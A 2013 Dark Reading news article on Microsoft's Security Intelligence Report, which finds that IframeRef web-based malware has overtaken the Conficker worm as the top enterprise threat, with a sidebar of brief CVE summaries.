Vulnerabilities / Threats
4/17/2013
06:19 PM
Connect Directly
Google+
Twitter
RSS
E-Mail
50%
50%
Repost This

Microsoft: Worms And Rogue AV Dying, Web Threats Thriving

Conficker finally flickering out, newest edition of Microsoft's Security Intelligence Report (SIR) shows

For the first time in nearly four years, the top malware threat plaguing enterprises is not the Conficker worm: Web-based attacks have taken over, according to new data gathered from more than 1 billion Windows machines worldwide.

IframeRef, a family of iFrame malware that infects Web servers, now holds the No. 1 spot, with a fivefold increase in the fourth quarter of 2012 alone with 3.3 million detections, according to the new Version 14 of Microsoft's Security Intelligence Report (SIR) for the second half of 2012.

"Conficker had been the No. 1 threat for the enterprise since we’ve been tracking domain-joined threats in [the second half of 2009]. In Q4, Conficker was significantly surpassed by IframeRef and was reflective of the overall impact of worms versus Web-based threats," says Holly Stewart, senior program manager for the Microsoft Malware Protection Center.

"The prevalence of IframeRef was a bit surprising," Stewart says. "I expected BlackHole [to be at the top]," she says. "But you're more likely to have a browser encounter with an iFrame redirector, so it really shot up over the past year."

The old mainstay worms, including Conficker and Autorun, dropped 37 percent from 2011 to the second half of 2012, mainly thanks to a second quarter 2011 update from Microsoft for XP and Vista and AV detections for Conficker. Stewart says Conficker had kept spreading for a while due to stolen passwords. "In the second quarter of 2012 is when Conficker started to decline, and this is a bit of a success story for IT pros. The changes they were making, [including] password security, are helping get rid of these worms," she says.

Even so, there are still users out there who don't run up-to-date antivirus programs: As a matter of fact, 2.5 out of 10 computers don't run up-to-date AV software, Microsoft's report says. And without updated AV, computers are 5.5 times more likely to get infected with malware, the report says.

"People intuitively understand the importance of locking their front doors to prevent their homes from being broken into. Computer security is no different. Surfing the Internet without up-to-date antivirus is like leaving your front door open to criminals," says Tim Rains, director of Trustworthy Computing at Microsoft. "With the release of this new research, Microsoft is urging people to make sure they have up-to-date Antivirus installed on their computers."

Interestingly, fake antivirus infections -- most commonly a consumer problem -- also began to decline over the second half of 2012. "For the first time in many years, we see a decline in the incidence of fake AV," Stewart says.

A Web Of Threats
But when one attack vector fizzles, another ignites: Microsoft's SIR shows how Web-borne attacks are on the rise, big-time.

Microsoft's findings on Web threats jives with that of Symantec's, which yesterday released its annual threat report. Symantec says Web-based attacks jumped by 30 percent last year, and the number of phishing sites posing as social networking sites exploded by 125 percent as attackers set their sights on social networks.

"These attacks silently infect enterprise and consumer users when they visit a compromised website," according to Symantec's Internet Security Threat Report 2012. "These attacks are successful because enterprise and consumer systems are not up to date with the latest patches for browser plug-ins, such as Adobe’s Flash Player and Acrobat Reader as well as Oracle’s Java platform. While a lack of attentiveness can be blamed for consumers remaining out of date, often in larger companies, older versions of these plug-ins are required to run critical business systems, making it harder to upgrade to the latest versions. Such patch management predicaments, with slow patch deployment rates, make companies especially vulnerable to Web-based attacks."

Stewart says the wave of Web attacks exploiting SQL injection and cross-site scripting flaws in websites during the past year contributed to some of the spikes in these attack numbers.

Seven of the top 10 threats discovered most on enterprise machines have Web threat ties, Stewart notes. "They are either a Web threat themselves or are known to be delivered through a Web threat in compromised websites, malicious websites, or a combination," she says. "Two are related to iFrame redirection, which is the middleman of Web-based attacks."

After Iframe Ref, the top malware families found in enterprises in the second half of last year were, in order, Conficker, Keygen, Autorun, Blacole, BlacoleRef, Zbot, Sirefef, Dorkbot, and Pdfjsc.

The IframeRef Trojan was found in 2.3 percent of machines in the first quarter of last year, and 13.6 percent by the fourth quarter.

Microsoft's SIR v14 drew data from 1 billion computers in more than 100 countries and regions, up from 600 million machines last year. The full SIR is available here for download.

Have a comment on this story? Please click "Add Your Comment" below. If you'd like to contact Dark Reading's editors directly, send us a message.

Kelly Jackson Higgins is Senior Editor at DarkReading.com. She is an award-winning veteran technology and business journalist with more than two decades of experience in reporting and editing for various publications, including Network Computing, Secure Enterprise Magazine, ... View Full Bio

Comment  | 
Print  | 
More Insights
Register for Dark Reading Newsletters
White Papers
Cartoon
Current Issue
Video
Slideshows
Twitter Feed
Dark Reading - Bug Report
Bug Report
Enterprise Vulnerabilities
From DHS/US-CERT's National Vulnerability Database
CVE-2013-1421
Published: 2014-04-22
Cross-site scripting (XSS) vulnerability in Craig Knudsen WebCalendar before 1.2.5, 1.2.6, and other versions before 1.2.7 allows remote attackers to inject arbitrary web script or HTML via the Category Name field to category.php.

CVE-2013-2105
Published: 2014-04-22
The Show In Browser (show_in_browser) gem 0.0.3 for Ruby allows local users to inject arbitrary web script or HTML via a symlink attack on /tmp/browser.html.

CVE-2013-2187
Published: 2014-04-22
Cross-site scripting (XSS) vulnerability in Apache Archiva 1.2 through 1.2.2 and 1.3 before 1.3.8 allows remote attackers to inject arbitrary web script or HTML via unspecified parameters, related to the home page.

CVE-2013-4116
Published: 2014-04-22
lib/npm.js in Node Packaged Modules (npm) before 1.3.3 allows local users to overwrite arbitrary files via a symlink attack on temporary files with predictable names that are created when unpacking archives.

CVE-2013-4472
Published: 2014-04-22
The openTempFile function in goo/gfile.cc in Xpdf and Poppler 0.24.3 and earlier, when running on a system other than Unix, allows local users to overwrite arbitrary files via a symlink attack on temporary files with predictable names.

Best of the Web